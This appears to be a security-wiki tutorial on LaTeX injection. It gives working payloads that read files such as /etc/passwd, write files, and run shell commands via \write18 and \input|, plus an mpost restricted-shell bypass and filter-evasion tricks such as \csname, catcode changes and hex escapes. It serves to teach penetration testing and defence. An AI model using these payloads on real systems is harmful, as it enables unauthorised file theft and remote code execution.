LaTeX
A powerful language for text markup and document generation, but dangerous for user input
LaTeX is used in many different contexts, often to create complex expressions like formulas, but it can also produce whole documents, as is common for official research papers.
The basic syntax of LaTeX is referencing variables and commands by prefixing words with a \ backslash. To provide arguments to a command, surround them with {} curly braces. A full document always starts with some small boilerplate defining what type of document it is and where its contents begin:
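A minimal sketch of that boilerplate, assuming the standard article class (any other class would work the same way):

```latex
% Declares the document type; "article" is just a common choice
\documentclass{article}
% Everything between \begin{document} and \end{document} is the content
\begin{document}
Hello, world!
\end{document}
```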
You can define commands yourself using the \newcommand command, and use them throughout the document:
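As a small sketch, the following defines a one-argument command. The name \hello is made up for illustration and is not a standard command:

```latex
\documentclass{article}
% \hello is a hypothetical command taking one argument (#1)
\newcommand{\hello}[1]{Hello, #1!}
\begin{document}
\hello{world}
\end{document}
```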
Result: Hello, world!
Use \renewcommand instead if the command already exists, which will overwrite it.
A .tex file is commonly compiled into a .pdf file for publishing, which is as easy as running the pdflatex command on the file, for example pdflatex document.tex (where document.tex stands in for your own file name).
During this compilation, all the code in the source file is executed to generate the resulting PDF. As we will explore more in the Exploitation (Injection) section, there are some dangerous commands that the compiler may or may not run for a document. This depends on a few command-line flags with different levels of restriction:
--shell-escape: Enable \write18 completely, allowing any unrestricted shell commands
--shell-restricted: Enable \write18, but only for certain predefined 'safe' commands (default)
--no-shell-escape: Disable \write18 completely
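To find out which of these levels a compilation is actually running with, pdfTeX offers a read-only integer called \pdfshellescape. The sketch below assumes the pdfTeX engine (pdflatex); other engines expose this information under different names.

```latex
\documentclass{article}
\begin{document}
% \pdfshellescape is a pdfTeX primitive:
%   0 = shell escape disabled, 1 = unrestricted, 2 = restricted
Shell escape level: \the\pdfshellescape
\end{document}
```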
LaTeX is very powerful and can do almost anything, from reading files to include in the document to writing files and executing system commands directly. Because of this, it is always dangerous to run user-provided code with LaTeX, and filter-based protection is hard to implement because of the complexity of the language and the many ways to bypass such filters.
There are a few special contexts where you may be able to inject. Depending on this, you may or may not be able to use certain commands, so it is important to understand how they work.
One useful command is \usepackage, which imports LaTeX packages with extra functionality. It can only be used in the "preamble", before \begin{document}. Trying to use it afterwards will result in an error message. For example:
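A short sketch of the difference, using the verbatim and listings packages purely as examples:

```latex
\documentclass{article}
\usepackage{verbatim}   % fine: this is still the preamble
\begin{document}
% The next line fails with "LaTeX Error: Can be used only in preamble."
\usepackage{listings}
\end{document}
```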
If your injection point comes after this, you will not be able to import new packages and will have to make do with the ones already imported.
By surrounding text with $ signs, it becomes a formula in LaTeX (math mode), which looks slightly different and has different rules, so some commands fail inside it. One example I could find is the \url{} command from the hyperref package:
This gives a vague error "LaTeX Error: Command $ invalid in math mode", which can be fixed by escaping from the formula. Simply close it with another $ in your input, perform the commands you want, and then open a new formula so that the closing $ of the original one still has a match:
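A sketch of this escape, assuming a hypothetical template that places user input between two $ signs and already loads hyperref:

```latex
% Hypothetical template:  $ USER_INPUT $
% Supplied input:         x$ \url{https://example.com} $y
% Resulting source line:
$ x$ \url{https://example.com} $y $
% "$ x$" and "$y $" are two valid formulas; \url now runs in text mode
```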
Let's start with exploiting. Without any special flags, LaTeX can read and include system files in the output, in a few different ways. One simple way is using \input, which runs and includes the specified file as more LaTeX code:
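For instance, a minimal sketch that targets /etc/passwd, chosen only because it is a familiar world-readable file:

```latex
\documentclass{article}
\begin{document}
% The file is parsed as LaTeX source and the result is typeset
\input{/etc/passwd}
\end{document}
```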
Another similar one is \include, with the difference being that it can only include .tex files:
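A sketch with a hypothetical file named notes.tex. The extension is left out because \include appends .tex by itself:

```latex
\documentclass{article}
\begin{document}
% Reads notes.tex (hypothetical name) from the working directory;
% \include also starts a new page before and after the content
\include{notes}
\end{document}
```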
Both of the above methods include the content as LaTeX code, meaning any unusual symbols may break the syntax. You may be able to fix parts of the syntax by prefixing it, but packages may offer cleaner ways that are designed to include raw data.
If the listings package is included, you will have access to the \lstinputlisting command, which also reads the file given as its argument:
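A minimal sketch, again with /etc/passwd as an illustrative target:

```latex
\documentclass{article}
\usepackage{listings}
\begin{document}
% Typesets the file as a code listing instead of executing it
\lstinputlisting{/etc/passwd}
\end{document}
```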
Similarly, the verbatim package also reads text literally:
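The verbatim package provides \verbatiminput for this. A minimal sketch with an illustrative path:

```latex
\documentclass{article}
\usepackage{verbatim}
\begin{document}
% Prints the file contents character for character
\verbatiminput{/etc/passwd}
\end{document}
```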
A more manual way (without packages) is opening a file and reading its lines:
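A sketch of this approach using TeX's low-level file primitives. The names \myfile and \fileline are made up for illustration:

```latex
\documentclass{article}
\begin{document}
\newread\myfile              % allocate an input stream
\openin\myfile=/etc/passwd   % open the file for reading
\read\myfile to\fileline     % store the first line in \fileline
\fileline                    % typeset it (still interpreted as LaTeX)
\closein\myfile
\end{document}
```

Each further \read fetches the next line of the file.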
This method also executes the content as LaTeX, meaning special characters like _ underscores may generate errors. We can patch the characters that cause trouble using \catcode, which changes the category of a character, here into that of a literal character:
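A sketch of such a patch, assuming the troublesome characters are _, $, & and #. The stream and macro names are illustrative, and the group keeps the changes from leaking into the rest of the document:

```latex
\documentclass{article}
\begin{document}
\newread\myfile
\openin\myfile=/etc/passwd
\begingroup
  % Category 12 ("other") makes a character print literally
  \catcode`\_=12 \catcode`\$=12 \catcode`\&=12 \catcode`\#=12
  \read\myfile to\fileline
  \fileline
\endgroup
\closein\myfile
\end{document}
```

The category codes must be changed before the \read, because a line is tokenized at the moment it is read.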
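Without any special flags, LaTeX can also write files to the system, which can lead to all kinds of problems. How far this reaches depends on the installation: TeX Live's openout_any setting defaults to p (paranoid), which limits writes to the working directory and below, while more permissive setups allow any path. This is arguably the most dangerous default feature of LaTeX and why user input should never be trusted there. See #writing-files for some ideas on privilege escalation techniques.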
Similarly to File read, you can open and write to a file:
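A harmless sketch that writes a single line to output.txt in the working directory. The stream name \outfile and the file name are illustrative:

```latex
\documentclass{article}
\begin{document}
\newwrite\outfile
% \immediate performs each operation right away instead of at page shipout
\immediate\openout\outfile=output.txt
\immediate\write\outfile{Hello, world!}
\immediate\closeout\outfile
\end{document}
```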
Depending on the backend, you may be able to write or overwrite critical files like source code or templates to achieve full Remote Code Execution.
LaTeX is so powerful that it can execute system commands from its syntax, in multiple different ways. One is to use the \write18 command, which accepts the command you wish to execute as its argument:
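A sketch that runs id and pulls its output back into the document. It assumes unrestricted shell escape, and output.txt is an arbitrary file name:

```latex
\documentclass{article}
\begin{document}
% Executes only when the compiler was started with --shell-escape
\immediate\write18{id > output.txt}
% Include the captured output in the PDF
\input{output.txt}
\end{document}
```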
Another less common way is using \input and the | character:
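A sketch of the piped form as it commonly appears in public payload lists. Whether the quoting is accepted can depend on the TeX distribution and LaTeX version, so treat the exact spelling as an assumption:

```latex
\documentclass{article}
\begin{document}
% A leading | asks the engine to read from the command's output;
% like \write18, this is subject to the shell escape setting
\input{|"id"}
\end{document}
```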
As explained in Compiling, the list of allowed commands is very restricted by default. The examples above would only execute if --shell-escape was turned on, allowing arbitrary commands.
The default allowed commands are stored in a big configuration file at /usr/share/texmf/web2c/texmf.cnf, where there are two interesting settings:
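In the file these two settings look roughly like the fragment below. The command list is shortened and purely illustrative, since the real list differs between TeX Live versions:

```text
% p = restricted: only commands in shell_escape_commands may run
% (t = fully enabled, f = disabled)
shell_escape = p

% Illustrative, shortened list; check your own texmf.cnf for the real one
shell_escape_commands = \
bibtex,bibtex8,\
kpsewhich,\
makeindex,\
repstopdf
```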
The shell_escape setting determines which of the 3 levels explained above is the default. In restricted mode, the shell_escape_commands variable is a comma-separated list that selects which commands are allowed. These commands should not allow you to do anything malicious, but there is a history of exploiting some of the functionality in these binaries to still perform some interesting actions.
If plain mpost is allowed (the default in earlier versions), the whole protection can be escaped by injecting commands (source). First, a parsable MetaPost file needs to exist so that the command does not crash before reaching our payload. This can be an existing file, or possibly one you created yourself, for example through an upload feature:
Then the following mpost arguments can execute arbitrary commands:
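A sketch of the idea, reconstructed from memory of the public proof of concept for CVE-2016-10243 and shown wrapped in \write18. The file name x.mp and the output path /tmp/pwn are placeholders, and the exact quoting should be treated as an assumption:

```latex
% Assumes restricted shell escape with plain mpost on the allow list
% and a parsable MetaPost file x.mp (hypothetical) in the working directory.
% -tex names the TeX program mpost should call, which is where the
% command is smuggled in.
\immediate\write18{mpost -ini "-tex=bash -c (id)>/tmp/pwn" "x.mp"}
```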
The example above executes id, but a more complex command will run into escaping trouble because spaces don't work. To make this easier, you can simply use ${IFS} in place of each space and use Base64 to encode the real payload (CyberChef):
Inside of LaTeX, it would look like this:
Some dangerous LaTeX commands might be blocked by a blacklist filter, but such a filter is hard to get right because there are many tricks to circumvent it with alternative methods.
The following paper explores many different ideas for attacking LaTeX files and has some tricks for evading filters (section 4.5):
One powerful trick if commands are blocked using strings like "\input" is to use \csname, which can represent a command without putting a \ in front of the command's name:
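A minimal sketch in which the literal string \input never appears in the source:

```latex
\documentclass{article}
\begin{document}
% \csname ... \endcsname builds the \input token from the plain word "input"
\csname input\endcsname{/etc/passwd}
\end{document}
```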
Another very powerful technique is using \catcode to change the meaning (category) of characters. For example, we could change the X character to mean "escape", just like \ would regularly. This is another way to evade filters that find commands prefixed with backslashes, but it can also be used to replace any other special character (see the link for a list of values).
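A sketch of the X example. The choice of X is arbitrary, and every later X in the document would also act as an escape character:

```latex
\documentclass{article}
\begin{document}
\catcode`X=0 % category 0 is the escape character
% From here on, Xinput is read as the command \input
Xinput{/etc/passwd}
\end{document}
```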
Using the special \makeatletter (make @ letter) command, you can change the category code of the @ character specifically, which makes internal commands with @ in their names usable, including some alternative spellings of \input:
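A sketch using \@input, an internal LaTeX kernel command that inputs a file if it exists. The kernel also keeps the original TeX primitive under the name \@@input.

```latex
\documentclass{article}
\begin{document}
\makeatletter            % @ may now appear in command names
\@input{/etc/passwd}     % internal variant of \input
\makeatother             % restore the normal meaning of @
\end{document}
```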
Using ^^XX hex escape sequences, you can also represent any blocked character literally, meaning that if this syntax is not blocked, you can evade practically any filter (CyberChef).
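A sketch that hides the backslash itself. TeX only accepts lowercase hex digits in this notation, so the backslash (0x5C) is written as ^^5c:

```latex
\documentclass{article}
\begin{document}
% TeX replaces the hex escape before tokenizing,
% so the next line is read as \input{/etc/passwd}
^^5cinput{/etc/passwd}
\end{document}
```

Letters can be encoded the same way, for example \in^^70ut, where ^^70 is the letter p.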
Lastly, by defining your own \begin and \end section, you can get arbitrary commands to be called. The argument in \begin defines the command, and the text in between is the argument. This trick bypasses almost any \ blacklist because it only uses regular \begin and \end:
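A sketch assuming the listings package is already loaded, which turns \lstinputlisting into an "environment":

```latex
\documentclass{article}
\usepackage{listings}
\begin{document}
% \begin{NAME} ends by calling \NAME, which then takes the next group
% as its argument
\begin{lstinputlisting}{/etc/passwd}\end{lstinputlisting}
\end{document}
```

One caveat when picking the command: \end{NAME} also calls \endNAME if that exists, so \end{input} would trigger the \endinput primitive and stop reading the current file after that line.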
Tip: A single one of these techniques might not get through the filter on its own, but combining them makes them far more powerful. Try using one technique to set up another, obfuscating it from any detection there may be.
A filter might try to prevent loops by blocking \repeat or similar commands, but forget that recursion is also an option. Here is a short command (named \l) that loops N times, with the first argument being the number of iterations and the second argument being the code to execute:
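One possible way to write such a command is sketched below. It is not necessarily the original author's definition, and it uses \def because LaTeX already defines \l as a text symbol:

```latex
\documentclass{article}
% #1 = number of iterations, #2 = code to run each time
\def\l#1#2{%
  \ifnum#1>0
    #2%
    % Call \l again with the counter decreased by one
    \expandafter\l\expandafter{\number\numexpr#1-1\relax}{#2}%
  \fi
}
\begin{document}
\l{3}{Hi }
\end{document}
```

Here \l{3}{Hi } typesets "Hi" three times.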
This can for example be used to read lines in a file:
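A sketch that reads the first three lines of a file with such a recursive loop. The loop definition is repeated so the example stands on its own, the names \myfile and \fileline are illustrative, and the file is assumed to have at least three lines:

```latex
\documentclass{article}
% Recursive loop: #1 = number of iterations, #2 = code to run each time
\def\l#1#2{%
  \ifnum#1>0
    #2%
    \expandafter\l\expandafter{\number\numexpr#1-1\relax}{#2}%
  \fi
}
\begin{document}
\newread\myfile
\openin\myfile=/etc/passwd
% Each iteration reads one line and typesets it as its own paragraph
\l{3}{\read\myfile to\fileline \fileline\par}
\closein\myfile
\end{document}
```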
To read the entire file, you can also make the EOF stop the recursion inside the command:
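A sketch of this variant, where \ifeof ends the recursion. The names \readall, \myfile and \fileline are made up for illustration, and the underscore is made literal first because it is assumed to be a likely troublemaker:

```latex
\documentclass{article}
\begin{document}
\newread\myfile
\openin\myfile=/etc/passwd
\catcode`\_=12 % print underscores literally instead of failing on them
\def\readall{%
  \ifeof\myfile
    % End of file reached: do nothing, which stops the recursion
  \else
    \read\myfile to\fileline
    \fileline\par
    % Close the conditional first, then recurse
    \expandafter\readall
  \fi
}
\readall
\closein\myfile
\end{document}
```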